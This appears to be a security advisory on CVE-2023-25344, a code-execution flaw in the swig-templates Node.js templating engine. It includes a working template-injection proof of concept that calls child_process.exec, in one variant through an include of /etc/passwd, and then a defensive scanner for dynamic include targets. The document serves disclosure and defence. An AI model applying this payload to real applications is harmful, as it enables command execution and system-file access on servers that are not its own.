Arbitrary Code Execution Affecting swig-templates package, versions *
- Snyk ID SNYK-JS-SWIGTEMPLATES-3266806
- published 7 Mar 2023
- disclosed 2 Feb 2023
- credit y1nglamore
Introduced: 2 Feb 2023
CVE-2023-25344
How to fix?
There is no fixed version for swig-templates.
Overview
swig-templates is a simple, powerful, and extendable templating engine for node.js and browsers, similar to Django, Jinja2, and Twig.
Affected versions of this package are vulnerable to Arbitrary Code Execution via the renderFile method.
Note: The following conditions are required to exploit the vulnerability:
- User input is used in the context of the package.
- User input is not sanitized.
- The value is dynamic.
PoC
// tpl.html
You need to ensure that the 1.html file exists
{% include "./1.html"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %}
or just use /etc/passwd
{% include "/etc/passwd"+Object.constructor("global.process.mainModule.require('child_process').exec('open -a Calculator.app')")() %}
// run.js
var swig = require('swig-templates');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);
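Since no fixed version exists, the practical control is to keep user input out of template source and to make sure every include/extends/import target in the templates you ship is a static string. The following is an added example, not code from the advisory or from the swig-templates project: a static scanner that flags tags whose target is anything other than a plain quoted literal (optionally followed by swig's include modifiers), which is the "value is dynamic" condition listed above. The helper names and the sample templates are constructed for this example.

```javascript
// Added example (not from the advisory or the swig-templates project): a static
// check for include/extends/import tags whose target is not a plain string literal.
// Helper names are hypothetical; the sample templates are constructed.

// Matches {% include ... %}, {% extends ... %} and {% import ... %} tags.
const TAG_RE = /\{%-?\s*(include|extends|import)\s+([\s\S]*?)\s*-?%\}/g;
// Modifiers swig accepts after a static target: with <var>, only, ignore missing, as <name>.
const MODIFIERS_RE = /^(?:\s+(?:with\s+\w+|only|ignore\s+missing|as\s+\w+))*\s*$/;

// Returns the leading quoted string of `arg` and whatever follows it, or null
// when `arg` does not start with a complete string literal.
function splitLeadingStringLiteral(arg) {
  const quote = arg[0];
  if (quote !== '"' && quote !== "'") return null;
  for (let i = 1; i < arg.length; i++) {
    if (arg[i] === '\\') { i++; continue; }   // skip the escaped character
    if (arg[i] === quote) return { literal: arg.slice(0, i + 1), rest: arg.slice(i + 1) };
  }
  return null;  // unterminated literal
}

// Scans one template's source. Each finding records the tag, its raw argument,
// the 1-based line number, and the reason it was flagged.
function findDynamicIncludes(source) {
  const findings = [];
  TAG_RE.lastIndex = 0;  // a global regex keeps state between calls
  let m;
  while ((m = TAG_RE.exec(source)) !== null) {
    const [, tag, arg] = m;
    const line = source.slice(0, m.index).split('\n').length;
    const parts = splitLeadingStringLiteral(arg);
    let reason = null;
    if (parts === null) {
      reason = 'target is not a string literal';
    } else if (!MODIFIERS_RE.test(parts.rest)) {
      reason = 'expression appended to literal';
    }
    if (reason !== null) findings.push({ tag, arg, line, reason });
  }
  return findings;
}

// Scans a map of file name -> template source and prefixes each finding with the file.
function scanTemplates(templates) {
  const all = [];
  for (const [file, source] of Object.entries(templates)) {
    for (const f of findDynamicIncludes(source)) all.push({ file, ...f });
  }
  return all;
}

// Constructed sample templates: one fully static, one with an expression
// concatenated onto a literal, one whose target is a variable.
const SAMPLE_TEMPLATES = {
  'safe.html': '{% extends "layout.html" %}\n<h1>Hi</h1>\n{% include "./header.html" ignore missing %}',
  'dynamic.html': '<p>x</p>\n{% include "./1.html" + someExpr %}',
  'variable.html': '{% include tpl_name with ctx only %}',
};

if (typeof module !== 'undefined' && require.main === module) {
  for (const f of scanTemplates(SAMPLE_TEMPLATES)) {
    console.log(`${f.file}:${f.line} {% ${f.tag} ${f.arg} %} -> ${f.reason}`);
  }
}
```

Run over a template directory in CI, any finding should fail the build: a template whose include target is computed at render time is exactly the shape the advisory describes, and the scanner deliberately treats an unterminated literal or an unknown trailing token as dynamic rather than guessing.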